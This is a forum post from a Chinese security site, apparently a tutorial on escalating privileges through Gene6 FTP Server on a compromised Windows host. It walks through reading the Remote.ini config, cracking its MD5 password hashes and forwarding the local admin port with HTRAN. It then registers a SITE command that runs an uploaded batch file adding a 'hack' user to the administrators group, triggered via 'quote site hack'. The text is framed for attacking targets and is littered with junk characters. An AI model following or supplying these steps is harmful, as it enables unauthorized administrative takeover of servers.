最近看过此主题的会员

返回列表 发帖

非安全中国网启用https声明

为适应更高的安全性,非安全中国网官方已经启用了全站HTTPS操作,更大限度了保证数据的安全性,适应未来的趋势,如有和非安全中国网互联的朋友们请有空的适合将本站的域名由http://www.sitedirsec.com更换为https://www.sitedirsec.com 谢谢合作!
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Gene6 FTP Server提权
Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.这一点和我们的SU一样,SU的管理端口是43958.Gene6 FTP Server的帐户配置文件在:C:Program FilesGene6 FTP ServerRemoteAdminRemote.ini;如果不在请自己手动查找.具体的不再废话.[Server]IP=127.0.0.1,8021' G& a- |* Z9 U1 Z  m4 A
这个是本地管理IP 和默认管理的端口,端口是可以修改的.GrantAllAccessToLocalHost=0[Acct=Administrator] 管理帐户Enabled=1Rights=0Password=202CB962AC59075B964B07152D234B70 管理帐户的密码的MD5的加密字符串[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表第一个帐号.Enabled=1Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字符串,可以去破解出密码的明文.Domain=RootFolder=Rights=0IPAccessList=我们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,然后进行连接.我们本地事先也安装一个Gene6 FTP Server软件.然后配置.新建一个远程FTP管理
* M2 F' {5 c, t' i5 v' o

/ ?5 F; f' v% E7 w/ W
HOST那里输入你要提权的IPPORT输入你用端口转发工具转发的端口,USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.不出意外我们就可以连接上去了.我们可以新建一个普通的帐号.我这里建一个名为msnhack密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置好权限.可以全部选上..

0 |& V- p- b  }: |6 u5 o
5 P% h& }1 L" }6 b; ]1 }
这样还不能提权.这里到了我们最核心的一步.1.写一个能执行命令的批处理文件,并上传到目标主机.@echo offnet user hack hack /addnet localgroup administrators hack /add2.然后在SITE COMMANDS那个地方再进行配置.

8 G3 Q8 K7 i, ~6 p6 x. ?
: R0 ~9 v; V% u' W- J6 v' x* G$ p
COMMAND那输入你的命令执行的名字.我写的是HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的. EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.

, k/ f+ o! W1 G9 I- o9 p
# ^6 i6 x. f8 Y( Q
只有两个帐号.现在我们登陆FTP进行提权操作.输入提权命令 "quote site hack"
$ r3 _- @! C+ e# a

1 T6 E: E8 w5 l0 Y. M; c1 _$ K
200 Command executed 命令成功执行.我们来看下加上帐号没有.
; l; @$ i+ B: n

, Y4 I+ T+ s0 _  r0 p; H2 V
已经多了一个HACK的帐号,权限为管理权限.提升权限已经成功
' h, J6 c/ L5 m- o

2 \6 ?! g1 h; x* y3 y) ~
$ Y; `0 t3 p5 N. L; r/ ]0 J9 x8 {
% E; g8 l2 b' _# ^% M+ {3 Q. X9 M) p+ }/ G9 [- G" z7 x, Y

2 D  {) U7 H  R4 X6 a
2 i) p% S$ G6 [5 y3 h& s, P) L9 I( f4 u/ L' V3 l7 M% G

6 k* ]# G0 X0 x! X  y4 M( u) u) c2 y+ T- e* z' n

2 e) S! W* B3 s/ Y, ^  O6 \; `2 A! V( _5 s  m' n

& m5 s3 Z) U8 R  a. J7 Y+ x, Q/ @" j3 j1 o$ i$ L7 r

3 C; b* E. e2 v
9 u/ [1 p) V8 r+ H: ^; O4 X
$ v2 |' ^4 |, i- ]/ _9 W8 k! z
5 }+ [  \% g9 {+ G" y) C
& W+ A6 Y5 o& |+ c公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表